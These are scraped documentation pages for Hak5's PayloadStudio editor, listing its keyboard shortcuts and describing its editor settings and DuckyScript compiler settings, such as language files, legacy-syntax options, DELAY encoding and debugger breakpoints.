### \[ Select or find next \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-or-find-next-x20)
Windows: Alt-K
Mac: Ctrl-G
### \[ Select or find previous \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-or-find-previous-)
Windows: Alt-Shift-K
Mac: Ctrl-Shift-G
### \[ Find \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-find-x20)
Windows: Ctrl-F
Mac: Command-F
### \[ Select to start \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-to-start-x20)
Windows: Ctrl-Shift-Home
Mac: Command-Shift-Home|Command-Shift-Up
### \[ Select to start \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-to-start-x20-1)
Windows: Ctrl-Shift-Home
Mac: Command-Shift-Home|Command-Shift-Up
### \[ Go to start \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-start-x20)
Windows: Ctrl-Home
Mac: Command-Home|Command-Up
### \[ Go to start \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-start-x20-1)
Windows: Ctrl-Home
Mac: Command-Home|Command-Up
### \[ Select up \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-up-x20)
Windows: Shift-Up
Mac: Shift-Up|Ctrl-Shift-P
### \[ Select up \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-up-x20-1)
Windows: Shift-Up
Mac: Shift-Up|Ctrl-Shift-P
### \[ Go line up \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-line-up-x20)
Windows: Up
Mac: Up|Ctrl-P
### \[ Go line up \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-line-up-x20-1)
Windows: Up
Mac: Up|Ctrl-P
### \[ Select to end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-to-end-x20)
Windows: Ctrl-Shift-End
Mac: Command-Shift-End|Command-Shift-Down
### \[ Select to end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-to-end-x20-1)
Windows: Ctrl-Shift-End
Mac: Command-Shift-End|Command-Shift-Down
### \[ Go to end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-end-x20)
Windows: Ctrl-End
Mac: Command-End|Command-Down
### \[ Go to end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-end-x20-1)
Windows: Ctrl-End
Mac: Command-End|Command-Down
### \[ Select down \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-down-x20)
Windows: Shift-Down
Mac: Shift-Down|Ctrl-Shift-N
### \[ Select down \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-down-x20-1)
Windows: Shift-Down
Mac: Shift-Down|Ctrl-Shift-N
### \[ Go line down \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-line-down-x20)
Windows: Down
Mac: Down|Ctrl-N
### \[ Go line down \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-line-down-x20-1)
Windows: Down
Mac: Down|Ctrl-N
### \[ Select word left \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-word-left-x20)
Windows: Ctrl-Shift-Left
Mac: Option-Shift-Left
### \[ Go to word left \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-word-left-x20)
Windows: Ctrl-Left
Mac: Option-Left
### \[ Select to line start \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-to-line-start-x20)
Windows: Alt-Shift-Left
Mac: Command-Shift-Left|Ctrl-Shift-A
### \[ Select to line start \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-to-line-start-x20-1)
Windows: Alt-Shift-Left
Mac: Command-Shift-Left|Ctrl-Shift-A
### \[ Go to line start \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-line-start-x20)
Windows: Alt-Left|Home
Mac: Command-Left|Home|Ctrl-A
### \[ Go to line start \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-line-start-x20-1)
Windows: Alt-Left|Home
Mac: Command-Left|Home|Ctrl-A
### \[ Go to line start \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-line-start-x20-2)
Windows: Alt-Left|Home
Mac: Command-Left|Home|Ctrl-A
### \[ Select left \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-left-x20)
Windows: Shift-Left
Mac: Shift-Left|Ctrl-Shift-B
### \[ Select left \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-left-x20-1)
Windows: Shift-Left
Mac: Shift-Left|Ctrl-Shift-B
### \[ Go to left \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-left-x20)
Windows: Left
Mac: Left|Ctrl-B
### \[ Go to left \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-left-x20-1)
Windows: Left
Mac: Left|Ctrl-B
### \[ Select word right \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-word-right-x20)
Windows: Ctrl-Shift-Right
Mac: Option-Shift-Right
### \[ Go to word right \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-word-right-x20)
Windows: Ctrl-Right
Mac: Option-Right
### \[ Select to line end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-to-line-end-x20)
Windows: Alt-Shift-Right
Mac: Command-Shift-Right|Shift-End|Ctrl-Shift-E
### \[ Select to line end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-to-line-end-x20-1)
Windows: Alt-Shift-Right
Mac: Command-Shift-Right|Shift-End|Ctrl-Shift-E
### \[ Go to line end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-line-end-x20)
Windows: Alt-Right|End
Mac: Command-Right|End|Ctrl-E
### \[ Go to line end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-line-end-x20-1)
Windows: Alt-Right|End
Mac: Command-Right|End|Ctrl-E
### \[ Go to line end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-line-end-x20-2)
Windows: Alt-Right|End
Mac: Command-Right|End|Ctrl-E
### \[ Select right \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-right-x20)
Windows: Shift-Right
Mac: Shift-Right
### \[ Go to right \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-right-x20)
Windows: Right
Mac: Right|Ctrl-F
### \[ Go to right \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-right-x20-1)
Windows: Right
Mac: Right|Ctrl-F
### \[ Page down \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-page-down-x20)
Mac: Option-PageDown
### \[ Go to page down \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-page-down-x20)
Windows: PageDown Mac: PageDown|Ctrl-V
### \[ Go to page down \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-go-to-page-down-x20-1)
Windows: PageDown Mac: PageDown|Ctrl-V
### \[ Page up \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-page-up-x20)
Mac: Option-PageUp
### \[ Toggle recording \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-toggle-recording-x20)
Windows: Ctrl-Alt-E
Mac: Command-Option-E
### \[ Replay macro \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-replay-macro-x20)
Windows: Ctrl-Shift-E
Mac: Command-Shift-E
### \[ Jump to matching \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-jump-to-matching-x20)
Windows: Ctrl-|Ctrl-P
Mac: Command-\\
### \[ Select to matching \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-to-matching-x20)
Windows: Ctrl-Shift-|Ctrl-Shift-P
Mac: Command-Shift-\\
### \[ Expand to matching \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-expand-to-matching-)
Windows: Ctrl-Shift-M
Mac: Ctrl-Shift-M
### \[ Remove line \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-remove-line-x20)
Windows: Ctrl-D
Mac: Command-D
### \[ Duplicate selection \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-duplicate-selection-x20)
Windows: Ctrl-Shift-D
Mac: Command-Shift-D
### \[ Sort lines \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-sort-lines-x20)
Windows: Ctrl-Alt-S
Mac: Command-Alt-S
### \[ Toggle comment \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-toggle-comment-x20)
Windows: Ctrl-/
Mac: Command-/
### \[ Toggle block comment \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-toggle-block-comment-x20)
Windows: Ctrl-Shift-/
Mac: Command-Shift-/
### \[ Modify number up \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-modify-number-up-x20)
Windows: Ctrl-Shift-Up
Mac: Alt-Shift-Up
### \[ Modify number down \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-modify-number-down-x20)
Windows: Ctrl-Shift-Down
Mac: Alt-Shift-Down
### \[ Replace \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-replace-x20)
Windows: Ctrl-H
Mac: Command-Option-F
### \[ Undo \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-undo-x20)
Windows: Ctrl-Z
Mac: Command-Z
### \[ Redo \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-redo-x20)
Windows: Ctrl-Shift-Z|Ctrl-Y
Mac: Command-Shift-Z|Command-Y
### \[ Copy lines up \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-copy-lines-up-x20)
Windows: Alt-Shift-Up
Mac: Command-Option-Up
### \[ Move lines up \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-move-lines-up-x20)
Windows: Alt-Up
Mac: Option-Up
### \[ Copy lines down \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-copy-lines-down-x20)
Windows: Alt-Shift-Down
Mac: Command-Option-Down
### \[ Move lines down \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-move-lines-down-x20)
Windows: Alt-Down
Mac: Option-Down
### \[ Delete \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-delete-x20)
Windows: Delete
Mac: Delete|Ctrl-D|Shift-Delete
### \[ Backspace \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-backspace-x20)
Windows: Shift-Backspace|Backspace
Mac: Ctrl-Backspace|Shift-Backspace|Backspace|Ctrl-H
### \[ Remove to line start \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-remove-to-line-start-)
Windows: Alt-Backspace
Mac: Command-Backspace
### \[ Remove to line end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-remove-to-line-end-x20)
Windows: Alt-Delete
Mac: Ctrl-K|Command-Delete
### \[ Remove to line end \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-remove-to-line-end-x20-1)
Windows: Alt-Delete
Mac: Ctrl-K|Command-Delete
### \[ Remove word left \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-remove-word-left-x20)
Windows: Ctrl-Backspace
Mac: Alt-Backspace|Ctrl-Alt-Backspace
### \[ Remove word left \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-remove-word-left-x20-1)
Windows: Ctrl-Backspace
Mac: Alt-Backspace|Ctrl-Alt-Backspace
### \[ Remove word right \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-remove-word-right-x20)
Windows: Ctrl-Delete
Mac: Alt-Delete
### \[ Outdent \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-outdent-x20)
Windows: Shift-Tab
Mac: Shift-Tab
### \[ Block outdent \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-block-outdent-x20)
Windows: Ctrl-\[\
\
Mac: Ctrl-\[\
\
### \[ Block indent \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-block-indent-x20)\
\
Windows: Ctrl-\]\
\
Mac: Ctrl-\]
### \[ Transpose letters \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-transpose-letters-x20)
Windows: Alt-Shift-X
Mac: Ctrl-T
### \[ To uppercase \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-to-uppercase-x20)
Windows: Ctrl-U
Mac: Ctrl-U
### \[ To lowercase \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-to-lowercase-x20)
Windows: Ctrl-Shift-U
Mac: Ctrl-Shift-U
### \[ Expand to line \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-expand-to-line-x20)
Windows: Ctrl-Shift-L
Mac: Command-Shift-L
### \[ Open command pallete \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-open-command-pallete-x20)
Windows: F1
Mac: F1
### \[ Add cursor above \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-add-cursor-above-x20)
Windows: Ctrl-Alt-Up
Mac: Ctrl-Alt-Up
### \[ Add cursor below \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-add-cursor-below-x20)
Windows: Ctrl-Alt-Down
Mac: Ctrl-Alt-Down
### \[ Add cursor above (skip current) \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-add-cursor-above-skip-current-x20)
Windows: Ctrl-Alt-Shift-Up
Mac: Ctrl-Alt-Shift-Up
### \[ Add cursor below (skip current) \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-add-cursor-below-skip-current-x20)
Windows: Ctrl-Alt-Shift-Down
Mac: Ctrl-Alt-Shift-Down
### \[ Select more before \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-more-before-x20)
Windows: Ctrl-Alt-Left
Mac: Ctrl-Alt-Left
### \[ Select more after \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-more-after-x20)
Windows: Ctrl-Alt-Right
Mac: Ctrl-Alt-Right
### \[ Select next before \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-next-before-x20)
Windows: Ctrl-Alt-Shift-Left
Mac: Ctrl-Alt-Shift-Left
### \[ Select next after \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-select-next-after-x20)
Windows: Ctrl-Alt-Shift-Right
Mac: Ctrl-Alt-Shift-Right
### \[ Split into lines \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-split-into-lines-x20)
Windows: Ctrl-Alt-L
Mac: Ctrl-Alt-L
### \[ Align cursors \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-align-cursors-x20)
Windows: Ctrl-Alt-A
Mac: Ctrl-Alt-A
### \[ Find all \] [_link_](https://docs.hak5.org/payload-studio/customization/keyboard-shortcuts/#-find-all-x20)
Windows: Ctrl-Alt-K
Mac: Ctrl-Alt-G
* * *
[_navigate\_before_ Appearance](https://docs.hak5.org/payload-studio/customization/appearance/)
[IDE Settings _navigate\_next_](https://docs.hak5.org/payload-studio/customization/ide-settings/)
---
# Editor Settings | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Editor Settings
===============
report
Some options are limited to **PayloadStudio Pro**. These will be indicated with the .png) label.
check\_circle
Even though each setting is named to be self explanatory - every setting in PayloadStudio contains an description / explanation tool-tip available **on hover**

Setting description tool-tip
### `Console Window Size (%)` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#console-window-size-)
Adjust this to change the size of the Console.
NAN;_Value is % it will cover the Main Editor._
_Default: 45_
### `Console Font Size (px)` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#console-font-size-px)
Change the Console, language editor and breakpoint editor default font size.
NAN;_Value in px._
_Default: 20_
### `Main Editor Font Size (px)` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#main-editor-font-size-px)
Change the Editor’s default font size.
NAN;_Value in px._
_Default: 20_
Editor Customization .png) [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#editor-customization)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### `Keybindings` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#keybindings)
Change keybinding / keyboard shortcut modes
**Options:**
* `Default (ACE)`
* `Vim`
* `Emacs`
* `Sublime`
* `VSCode`
### `Text Wrapping` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#text-wrapping)
Change the editor text wrapping mode
**Options:**
* `Off`
* `View`
* `Margin`
* `40`

Text Wrapping Options Demo
### `New Line Mode` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#new-line-mode)
Change the type of new lines used in the editor
**Options:**
* `Auto`
* `Unix`
* `Windows`
### `Use Soft Tabs` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#use-soft-tabs)
Checking this will use spaces instead of ‘hard’ tabs
### `Soft Tab Size` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#soft-tab-size)
Number of spaces to use as tab.
NAN;_Default: 4_
### `Show Invisible Characters` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#show-invisible-characters)
Checking this will display spaces and tabs as visible characters in the Editor.

Show Invisible Characters Enabled - showing spaces and line endings
### `Highlight Active Line` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#highlight-active-line)
Checking this will show the line the cursor is on by highlighting the entire line.

Highlight Active Line Enabled
### `Show Folding Widgets` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#show-folding-widgets)
Checking this will automatically show folding carats for foldable blocks of code (extensions,functions,ifs,…). This feature is required if Live Extension Validation is enabled

Folding Widget

Folded Code
### `Show Folding Widgets Only On Hover` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#show-folding-widgets-only-on-hover)
Checking this will only show folding carats for foldable blocks of code (`EXTENSION`,`FUNCTION`,`IF`, etc) while the mouse is over the Editor Gutter.
### `Show Gutter (line numbers, folding, info, warnings, breakpoints)` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#show-gutter-line-numbers-folding-info-warnings-breakpoints)
Checking this will show the bar for Line numbering, folding widgets, extension validation, annotations, breakpoints, warnings and errors. Option provided to ease of use on extremely slim screens - otherwise not recommended as the features previously mentioned rely on this being enabled
### `Auto Indent` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#auto-indent)
Checking this draws visible columns to help display nested blocks
### `Display Indentation Guides` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#display-indentation-guides)
Checking this draws visible columns to help display nested blocks

Indentation Guides Enabled

Indentation Guide Disabled
### `Display Print Margin` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#display-print-margin)
Checking this draws an character margin line in the editor
### `Print Margin Width` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#print-margin-width)
Number of characters wide to show print margin at. Default Value: 80
### `Escape key opens console` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#escape-key-opens-console)
Checking this will bind the ESCAPE key to open the console as well as close it
### `Always show Horizontal Scroll Bar` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#always-show-horizontal-scroll-bar)
Checking this will always show the editor’s horizontal scrollbar regardless of the document’s character width
### `Always show Vertical Scroll Bar` [_link_](https://docs.hak5.org/payload-studio/customization/editor-settings/#always-show-vertical-scroll-bar)
Checking this will always show the editor’s vertical scrollbar regardless of the document’s character width
* * *
[_navigate\_before_ IDE Settings](https://docs.hak5.org/payload-studio/customization/ide-settings/)
[Compiler Settings _navigate\_next_](https://docs.hak5.org/payload-studio/customization/compiler-settings/)
---
# Compiler Settings | Hak5 - Payload Studio
[](https://docs.hak5.org/payload-studio/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Compiler Settings
=================
report
Some options are limited to
PayloadStudio Pro
. These will be indicated with the .png) label
check\_circle
Even though each setting is named to be self explanatory - every setting in PayloadStudio contains an description / explanation tool-tip available **on hover**

Setting description tool-tip
DUCKY\_LANG [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#ducky_lang)
-------------------------------------------------------------------------------------------------------
### `Persist language file` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#persist-language-file)
With this option disabled, the language file will reset to default US every time PayloadStudio loads
### `Display DUCKY_LANG above editor` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#display-ducky_lang-above-editor)
Displays the current language file name above the main editor. Also provides shortcut to Settings - Compiler Settings.
### Changing Languages [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#changing-languages)
1. Navigate to **Settings** > **Compiler Settings**
2. Under the **DUCKY\_LANG** heading click the **Language** button\\

Settings > Compiler Settings > DUCKY\_LANG > Language button
3. Select, import or upload a new language file

Change Language Menu
### Reset Language [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#reset-language)
1. Navigate to **Settings** > **Compiler Settings**
2. Under the **DUCKY\_LANG** heading from the **Language Editor** select the  button from the editor’s toolbar

Reset language to Default US
### Download Current Language [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#download-current-language)
Click the download

Download
button from the editor’s toolbar

Download Language File
### Editing Language Directly .png) [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#editing-language-directly)
Editing the language directly from within PayloadStudio Pro is as simple as making the changes in the dedicated Language Editor
info
Click the  button to make the language editor larger.

Pending Language File Changes
After saving your changes, metadata will appear above the editor

Language File Metadata
warning
Languages must be valid JSON to import, upload or save. Key value pairs with valid hex as the value. See [example](https://github.com/hak5/usbrubberducky-payloads/blob/master/languages/us.json)
on Github

Language file errors
Compiler Options .png) [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#compiler-options)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### `Warn on lines modified by DEFINE` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#warn-on-lines-modified-by-define)
Shows lines modified by DEFINE as a warning to help ensure the result of build is as expected. Unchecking this will still annotate as info, but **will not remind you** as part of output in console on compile.

Annotation

Compiler output
### `Clear console on Compile` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#clear-console-on-compile)
With this option enabled, the contents of the Console will be cleared automatically when you click Generate Payload. _Scroll back / history will be kept._
### `Delete console history on compile` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#delete-console-history-on-compile)
With this option enabled, the contents and history of the Console will be deleted automatically when you click Generate Payload.
### `Show detailed payload memory usage` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#show-detailed-payload-memory-usage)
Shows a more specific breakdown of byte usage in your payload to help you optimize and plan around any scenario

Detailed Payload Memory Usage Compiler Output
### `Show remaining payload memory below editor` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#show-remaining-payload-memory-below-editor)
Shows the remaining available payload memory below the main editor.
**Requires**
** **
**`Live Error Checking`**
** **
**to be enabled.**

Remaining payload memory indicator pinned to bottom left of the editor
### `Show info, error and warning counts above editor` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#show-info-error-and-warning-counts-above-editor)
Shows DuckyScript compiler info, error and warning counts above editor. Provides shortcuts to step through each in the payload.

info, error and warning count pinned to top right of the editor
### `Set editor to read only on compile` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#set-editor-to-read-only-on-compile)
With this option enabled, clicking the Generate Payload button will set the editor to Read only to prevent any further accidental changes (temporarily) ensuring the inject.bin will match the editor.
info
Toggle editor from Read Only to Editing by clicking the label or icon pinned to the top right above the editor

Read Only Mode

Editing Mode
### `Download inject.bin on successful compile` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#download-injectbin-on-successful-compile)
With this option enabled, after successfully compiling a payload, PayloadStudio will automatically prompt you to download/save the inject.bin
### `Download payload source on successful compile` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#download-payload-source-on-successful-compile)
With this option enabled, after successfully compiling a payload, PayloadStudio will automatically prompt you to download/save the DuckyScript payload used to compile the inject.bin
Syntax / Version Control .png) [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#syntax--version-control)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
### `Lock compiler version to DuckyScript Version 1.0` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#lock-compiler-version-to-duckyscript-version-10)
This will lock DuckyScript compiler compatibility to version 1.0 syntax and behavior only.\\

Incompatible DuckyScript 1.0 Syntax Errror annotation
### `Treat STRING blocks as HEREDOC` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#treat-string-blocks-as-heredoc)
Checking this box will prevent the compiler from stripping indentation tabs from text inside a STRING block.
This is provided as a fallback for formatting ascii art - because why not?
### `Allow DEPRECATED DuckyScript 1.0 Fallback Syntax` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#allow-deprecated-duckyscript-10-fallback-syntax)
**Recommended Setting: Disabled/Unchecked (**
****`**DEPRECATED SYNTAX**`****
**)**
Allow deprecated original DuckyScript 1.0 Syntax/Behavior: lines that don’t match any other syntax will encode the first word or first character.
NAN;_This is provided only as a compatibility option for old payloads that took advantage of this side affect._

Error thrown with option disabled
RECOMMENDED

Warning thrown with option disabled
NOT RECOMMENDED
### `Allow implicit modifiers in key combos` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#allow-implicit-modifiers-in-key-combos)
**Recommended Setting: Disabled/Unchecked (**
****`**DEPRECATED SYNTAX**`****
**)**
Allow deprecated original DuckyScript 1.0 Syntax/Behavior:
NAN;_Example: ‘CONTROL S’ is implicitly CONTROL **SHIFT** s because S **is** SHIFT + s_

Error thrown with option disabled
RECOMMENDED

Warning thrown with option disabled
NOT RECOMMENDED
### Compiler Settings > DuckyScript Optimizations .png) [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#compiler-settings--duckyscript-optimizations)
### `Optimize DELAY encoding` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#optimize-delay-encoding)
Forces compiler to use the most efficient DELAY encoding. Giving you more space in your payload to write other code.
warning
This **MAY** lock compatibility to Advanced DuckyScript 3.0.
### `Always use new DELAY encoding` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#always-use-new-delay-encoding)
Forces compiler to always use DuckyScript 3.0 DELAY encoding.
report
This **WILL** lock compatability to Advanced DuckyScript 3.0.
### `Optimize repeated injections`
`*`
[_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#optimize-repeated-injectionshahahugoshortcode1s35hbhb)
\*Coming soon - we appreciate your patience.
This feature attempts to hyper-optimize STRING injection across the entire payload
DuckyScript Debugging .png) [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#duckyscript-debugging)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
For use with Ducky Debugger - With this option enabled, clicking the gutter for a specific line will toggle (create/destroy) a debugging breakpoint for that line
### `Enable DuckyScript 3.0 breakpoints and debugger` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#enable-duckyscript-30-breakpoints-and-debugger)
For use with Ducky Debugger
\- With this option enabled, clicking the gutter for a specific line will toggle (create/destroy) a debugging breakpoint for that line\\

Breakpoint on line 300
### `Debug builds compile breakpoints` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#debug-builds-compile-breakpoints)
Checking this will include all IDE Breakpoints when generating a debug build.\\

Generate Debug inject.bin button
### `Debug builds convert modifiers and keycombos to STRINGS` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#debug-builds-convert-modifiers-and-keycombos-to-strings)
Checking this will compile all modifiers and key-combos into PayloadStudio safe STRING commands.
info
_This is useful while debugging directly inside the PayloadStudio Console as it prevents the payload from leaving the browser._
### `Set editor to read only on debug compile` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#set-editor-to-read-only-on-debug-compile)
With this option enabled, clicking the Generate Debug button will set the main editor to Read only to prevent any further accidental changes (temporarily) ensuring the inject.bin will match the editor.
### `Annotate Payload Memory Usage By Line` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#annotate-payload-memory-usage-by-line)
**Recommended Setting: Disabled/Unchecked (**
****`**affects performance**`****
**)**
Shows number of bytes it takes to execute each line as an INFO annotation in the main editor.

Payload Memory usage annotation
### `Annotate Expensive Operations` [_link_](https://docs.hak5.org/payload-studio/customization/compiler-settings/#annotate-expensive-operations)
With this option enabled, expensive operations will be annotated in the main editor.
